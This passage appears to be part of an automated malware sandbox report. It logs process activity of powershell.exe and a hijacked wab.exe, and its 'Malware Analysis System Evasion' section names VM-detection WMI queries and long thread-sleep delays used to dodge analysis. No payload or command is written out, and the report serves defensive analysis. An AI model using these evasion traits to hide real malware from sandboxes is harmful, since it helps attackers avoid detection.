            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 23910000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 237D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199889Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199563Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199438Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199313Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199188Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199075Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1198969Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4932Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4951Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7513Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2245Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5559Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 4264Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2804Thread sleep count: 7513 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5712Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4372Thread sleep count: 2245 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -33204139332677172s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5312Thread sleep count: 5559 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -199532s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99656s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99547s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99438s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5312Thread sleep count: 4264 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99327s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99203s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99087s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98969s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98831s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98704s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98579s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98454s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98329s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98204s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98079s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -97967s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -97854s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -97735s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -97610s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99888s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99641s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99525s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99407s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99297s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99188s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -99078s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98964s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98856s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98750s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98641s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98530s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98421s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98313s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98172s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -98063s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -97953s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -1200000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -1199889s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -1199781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -1199672s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -1199563s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -1199438s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -1199313s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -1199188s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -1199075s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5320Thread sleep time: -1198969s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99438Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99327Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99203Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99087Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98969Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98831Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98704Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98579Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98454Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98329Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98204Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98079Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97967Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97854Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97735Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99888Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99641Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99525Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99407Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99188Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99078Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98964Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98856Jump to behavior
